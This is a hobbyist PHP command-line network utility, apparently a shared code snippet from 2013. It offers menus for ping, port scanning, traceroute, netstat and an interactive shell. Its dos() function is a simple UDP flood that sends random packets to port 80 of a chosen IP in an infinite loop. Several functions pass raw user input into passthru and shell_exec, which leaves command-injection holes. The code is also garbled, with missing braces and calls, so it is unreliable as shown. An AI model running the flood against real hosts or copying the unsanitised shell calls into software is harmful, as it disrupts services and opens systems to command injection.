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Created June 18, 2013 17:14
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im trying to make a general purpose simple php network script with network and system functions i tryed to put as much as i could. i want to put telnet and netcat and an auto scan and connect function but i have some hard time in coding.
//php network script
//works only on cli
//by zeron abraham (any response would be appreciate)
/*im trying to make a general purpose simple php network script with network and system functions
i tryed to put as much as i could.
i want to put telnet and netcat and an auto scan and connect function but i have some hard time in coding.*/
// curl extension must enable!!!,for ubuntu-mint... apt-get install php5-curl
//works both linux and windows(very unstable on windows) mostly linux
//use with caution
//contains simple functions like ping ,portscan till a simple DoS attack
//free for all change it ,make it better!
//more later...not finished yet
/*ping not actualy ping,ping and icmp packets its not really using any ports because its below tcp/ip osi level,
from main menu *ping* works only on 80 open hosts(its like httping) if this could be consider ping.
so u would not be able to ping machines behind filtered firwalls.
im trying to avoid as much as i can exec() function,
in tools submenu is second ping function working with exec(didnt had any other option)
echo " \n",'||>----Welcome to a php network script----<||', " \n";
class net { //base class with the basic 9 options and its funtions
function out() {
@$name = exec('whoami');
@$date = date("j, n, Y");
echo " \n",'||+-->--------------------Main Menu------------------<--+||', " \n";
echo '|+-->Option>-1 Host Ping ', " \n";
echo '|+-->Option> 2. DoS ', " \n";
echo '|+-->Option> 3. portscan', " \n";
echo '|+-->Option> 4. Traceroute ', " \n";
echo '|+-->Option> 5. Netstat ', " \n";
echo '|+-->Option> 6. Ftp ', " \n";
echo '|+-->Option> 7. tools', " \n";
echo '|+-->Option> 8. help', " \n";
echo '|+-->Option> 9. Exit', " \n";
echo '||+>-----------|Protectron<->Protectsoft|-----------<||>';
if (!$name) { echo ' ';
} else
{ echo $name;
if (!$date) { echo ' ';
} else
{ echo "|>",$date, " \n"," \n";
} //if date and whoami fails just echo nothing
function ping($url=NULL) {
if($url == NULL) return false; // curl extension must enable,for ubuntu-mint... apt-get install php5-curl
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_TIMEOUT, 4);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpcode>=200 && $httpcode<300) {
echo "|---->host $url is online<--------||", " \n";
} else {
echo "|---->host $url is unavailable!<--------||", " \n";
function ftp($ip) {
$ftp = passthru("ftp $ip");
function nmap($ip,$port) {
$scan = @fsockopen($ip,$port,$errno, $errstr, 3);
if (!$scan) {
echo " \n","||--->Port is closed or not opened<---||", " \n";
} else {
echo " \n",'|---->',"|Host> $ip |UP| and |port> $port are open--<|", " \n"," \n";
function traceroute($a) {
$trace = passthru("traceroute $a"); //passthru in this case rather exec,passthru outputs raw data
if (!$trace) {
echo " \n","|--->Failed!...trying tracert...", $tracert = passthru("tracert $a"); }
else { echo $trace;
function netstat ($a) {
echo '|--->Netstat may take a while '," \n";
$netstat = passthru("netstat $a"); //$a for netstat options
function tcpdump ($a,$b) {
function dos($ip) { //this one is very only in lan.send big amount of packeges to 80 port
$socket = socket_create(AF_INET,SOCK_DGRAM,SOL_UDP); // Create sockets
if(!$socket) {
die("Unable to create sockets.");
} // Unable to create sockets
$data = "";
for($i = 0;$i < 1500; $i++){
$data.= chr(rand(0,255));} // Generate random data with 1500 bytes length (limit)
while(true) //Infinite loop
if(!socket_sendto($socket,$data,strlen($data),0,$ip,80)) {
die("Unable to send sockets.");} echo (" |.| ");
$b = new tools();
$a = new net();
$input = fwrite(STDOUT,"|>----choose function:~/$ ");
$input = trim(fgets(STDIN));
if ($input == 1) {
$input = fwrite(STDOUT,"|>----enter ip:~/$ ");
$input = trim(fgets(STDIN));
goto menu;
elseif ($input == 2) {
$input = fwrite(STDOUT,"|>----enter ip for DoS:~/$ ");
$input = trim(fgets(STDIN));
goto menu;
elseif ($input == 3) {
$input = fwrite(STDOUT,'|>----enter ip:~/$');
$input = trim(fgets(STDIN));
$input2 = fwrite(STDOUT,'|>----enter port:~/$');
$input2 = trim(fgets(STDIN));
goto menu;
elseif ($input == 4) {
$input = fwrite(STDOUT,'|>----enter ip or host:~/$');
$input = trim(fgets(STDIN));
goto menu;
elseif ($input == 5) {
$input5 = fwrite(STDOUT,'||>----Enter option for netstat or hit enter to scan all:~/$');
$input5 = trim(fgets(STDIN));
goto menu;
elseif ($input == 6) {
$input6 = fwrite(STDOUT,'||>---Enter ip or host name:~/$');
$input6 = trim(fgets(STDIN));
goto menu;
elseif ($input == 8) {
goto menu;
elseif ($input == 7) {
goto submenu;
elseif ($input == 9) {
exit ;
} else {
echo " \n", '|>--------Wrong option try again--------<|', " \n", " \n";
goto menu;
class tools extends net { // extended class tools from main class net.9 more suboptions from main option tools.
function outb() {
echo " \n",' ||>>-------->Tools<-------->>>>||', " \n";
echo " \n",'|>----Option 1. local ip:', " \n";
echo '|>----Option 2. Ping:', " \n";
echo '|>----Option 3. Whoami:', " \n";
echo '|>----Option 4. Environment:', " \n";
echo '|>----Option 5. Top:', " \n";
echo '|>----Option 6. Matrix illusion:', " \n";
echo '|>----Option 7. Php shell:', " \n";
echo '|>----Option 8. Shell window:', " \n";
echo '|>----Option 9. Main Menu:' , " \n";
function ip($a) {
@$ip = shell_exec('ipconfig'); //if ifconfig fails runs ipconfig for both linux and windows
if (!$ip) {
echo "|---->ipconfig command not found! trying ifconfig..."," \n", $ip1 = shell_exec('ifconfig'); }
function whoami($a) {
@$who10 = exec('echo %USERDOMAIN%\%USERNAME%'); //
if (!$who10) { echo ' ';}
else { echo " \n",'|>>>>----|',$who1 = exec('whoami'),'---------------<||', " \n"; }
function ping1($ip) {
echo " \n","|-----------$ip---------->>"," \n"; //just a simple ping function works both linux n windows
$ping = shell_exec("ping -w 4 $ip");
if (!$ping) {echo shell_exec("ping $ip"); }
else {echo $ping;}
function top() {
$top = shell_exec('top -n 1'); //top only for linux
if (!$top) { echo 'failed';}
else { echo $top," \n";}
$input2 = fwrite(STDOUT,'|----->Press any button to continue:');
$input2 = trim(fgets(STDIN));
if ($input2 == null) {$this->outb();} else {$this->outb();}
function matrix() { //this one is one of my favorite.outputs random 0 n 1 creating a matrix like ilusion
//works only on cli
//by zeron
$table = array('| |');
$numbers = array(0,1,00,01,10,11,111,000,' ');
foreach ($numbers as $numbers) {
usleep(900); // change this to increase or decrease speed
echo "$numbers";
foreach ($table as $table) {
usleep(900); // // change this to increase or decrease speed
echo "$table";
goto matrix;
function phpshell() { //a php command line shell
$name = exec('whoami');
$out = fwrite(STDOUT,"$name@box~/$:");
$out = trim(fgets(STDIN));
echo shell_exec($out);
if ($out == 'exit') {
goto phpshell;
function window() { //just echo the following
$who = exec('whoami');
echo ' _________________________________________________________ '," \n";
echo ' |File|Edit|View|Terminal_________________________|_|[]|X||'," \n";
echo ' '," $who",':~$',' echo `im php developer`',' || '," \n";
echo ' || '," \n";
echo ' || '," \n";
echo ' || '," \n";
echo ' || '," \n";
echo ' || '," \n";
echo ' || '," \n";
echo ' || '," \n";
echo ' || '," \n";
echo ' || '," \n";
echo ' _______________________________________________________|| '," \n";
function main() {
$input = fwrite(STDOUT,"|>----choose function:~/$ ");
$input = trim(fgets(STDIN));
if ($input == 1) {
goto submenu;
elseif ($input == 3) {
goto submenu;
elseif ($input == 5) {
$b-> top();
goto submenu;
elseif ($input == 6) {
goto submenu;
elseif ($input == 7) {
goto submenu;
elseif ($input == 8) {
goto submenu;
elseif ($input == 2) {
$input1 = fwrite(STDOUT,"|>----enter ip:~/$ ");
$input1 = trim(fgets(STDIN));
goto submenu;
elseif ($input == 9) {
goto menu;
elseif ($input == 4) {
echo shell_exec('env');
echo '||>---------------------------------------------------------------|>||', " \n";
goto submenu;
} else { echo " \n",'|>>------Wrong option try again------>>>>', " \n";
goto submenu;
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